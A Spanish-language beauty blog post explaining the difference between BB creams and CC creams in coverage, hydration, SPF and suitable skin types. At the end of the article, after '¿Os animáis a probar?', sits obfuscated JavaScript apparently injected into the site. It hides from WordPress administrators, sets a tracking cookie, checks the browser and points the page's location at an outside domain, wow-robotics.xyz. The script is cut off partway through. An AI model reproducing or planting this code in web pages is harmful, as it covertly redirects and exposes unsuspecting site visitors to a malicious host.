Quién no ha oido hablar de las BB creams. Hace un par de años este tipo de cremas irrumpió en perfumerías con mucha fuerza y éxito, ya que son cremas que contienen color, hidratan, tienen anti-oxidantes y dan buen aspecto a la piel en un solo paso. Anteriormente necesitabamos varios productos para crear ese efecto. Pues bien, ahora las casas de cosmética lanzan las CC creams, que prometen ser incluso más completas que sus predecesoras, pero…¿que diferencia hay entre ellas?, no os preocupéis, veréis que son un tipo de cremas muy similares, si bien las últimas incorporan en sus ingredientes algunos extra que las primeras no tenían. Tenemos que tener claro la diferencia que hay entre ellas para poder escoger bien el producto que realmente necesitamos… Vamos allá.

BB creams (Blemish balm cream) — La mayoria de las BB creams nos aportan algo de color (muy sutil ya que no se trata de maquillajes y no tienen apenas cobertura), hidratación y protección ya que casi todas contienen filtro SPF. Dependiendo de la marca, podemos encontrar también BB creams con componentes antiarrugas o reafirmantes. En definitiva, son cremas en principio creadas para pieles jóvenes y destinadas a mujeres que quieren utilizar una crema que tenga todos esos beneficios con un solo producto. No  os preocupéis, cada crema se fabrica en varias tonalidades para que podamos elegir la que más se adapta a nuestro color de piel;)
Desventajas de estas cremas: No se pueden utilizar para cubrir imperfecciones tales como manchas, marcas de acné etc, ya que su cobertura es escasa. Si buscamos algo que sea cubriente, debemos  emplear una CC cream, o crema hidratante y después base de maquillaje.

CC creams (color correction cream)– La diferencia de estas últimas es que tienen mayor corrección de imperfecciones, con lo cual son más cubrientes con respecto al color, en definitiva, es lo más parecido al maquillaje sin llegar a serlo realmente. También muchas de ellas incorporan activos anti-manchas y anti-edad.

En principio una piel joven podría utilizar una BB cream sin problema, ya que este tipo de pieles necesita hidratación+protección+cobertura/baja/media. Aunque podrían utilizar CC cream sin problema para tener un poco mas de cobertura, incluso ir alternándolas si se desea. Hay que decir que ninguno de los dos formatos contiene aceites, son oil-free. ¡¡Además, las 2 están formuladas para todo tipo de pieles!!

Bien…ahora que ya sabemos la diferencia entre ellas …

¿Os animáis a probar? var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone